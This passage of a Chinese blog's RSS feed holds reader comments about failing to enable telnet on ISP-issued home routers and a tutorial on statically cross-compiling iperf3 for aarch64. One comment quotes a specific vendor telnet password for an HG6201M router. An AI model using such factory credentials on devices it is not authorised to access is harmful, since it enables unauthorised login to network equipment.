Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;四川移动H2-3无法开启telnet，显示502 Bad Gateway The CGI was not CGI/1.1 compliant.软件版本V2.6.03.01&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;HG6201M，方法二在telnet登录时密码 Fh@A96080 无效，会提示Login incorrect&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px; margin-bottom: 0px; padding: 0px; line-height: 1.69em; white-space-collapse: preserve;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;&lt;span style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; font-size: 16px; white-space: pre-line; background-color: #FFFFFF;&quot;&gt;浙江移动吉比特 G-1426-MA
CMD命令后是这样的：
C:\Users\Xia25&amp;gt;telnet 192.168.1.1
正在连接192.168.1.1...无法打开到主机的连接。 在端口 23: 连接失败&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;</description><pubDate>Tue, 31 Dec 2024 15:38:32 +0800</pubDate></item><item><title>iperf3交叉编译--静态</title><link>https://www.qxhut.cn/?id=43</link><description>&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;1.1 获取源代码&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;git clone https://github.com/esnet/iperf.git&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;1.2 编译&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;1. 配置&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;a) 静态链接库&lt;/span&gt;&lt;/p&gt;&lt;p&gt;./configure --host=aarch64-linux-gnu&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; --without-sctp&amp;nbsp; &amp;nbsp; &amp;nbsp; --prefix=/mnt/20241226/iperf_install&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;--enable-static-bin&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;参数解析：&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;--host=aarch64-none-linux-gnu ——&amp;gt;配置并指定交叉编译工具链;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;--prefix=/home/cw/tools/iperf_install ——&amp;gt;指定安装路径，如果不添加，配置文件中会有一个默认安装路径，如果是交叉编译时（给其它平台编译时），最好加上，这样直接执行make install时，可以把相关文件放到此目录下；&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;--without-sctp&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;1, SCTP还没有静态连接库，所以最好在configure时也加上 --without-sctp配置项，去除SCTP的支持。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;2, 会出现这样的告警，warning: Using ‘getaddrinfo’ in statically linked applications requires at runtime the shared libraries from the glibc version used for linking，查了一下&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;，这个问题是glibc的遗留问题，似乎无解。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;2. 编译源码&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;make&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;3. 安装&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;make install&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;示例&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;cw@svr20:~/iperf$ ls ../iperf_install/*&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;../iperf_install/bin:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;iperf3&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;../iperf_install/include:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;iperf_api.h&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;../iperf_install/lib:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;libiperf.a&amp;nbsp; libiperf.la&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;text-wrap-mode: nowrap;&quot;&gt;../iperf_install/share:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;工具链信息&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://www.qxhut.cn/zb_users/upload/2024/12/202412261735193678226636.png&quot; alt=&quot;1735193667699.png&quot;/&gt;&lt;/p&gt;</description><pubDate>Thu, 26 Dec 2024 14:07:27 +0800</pubDate></item></channel></rss>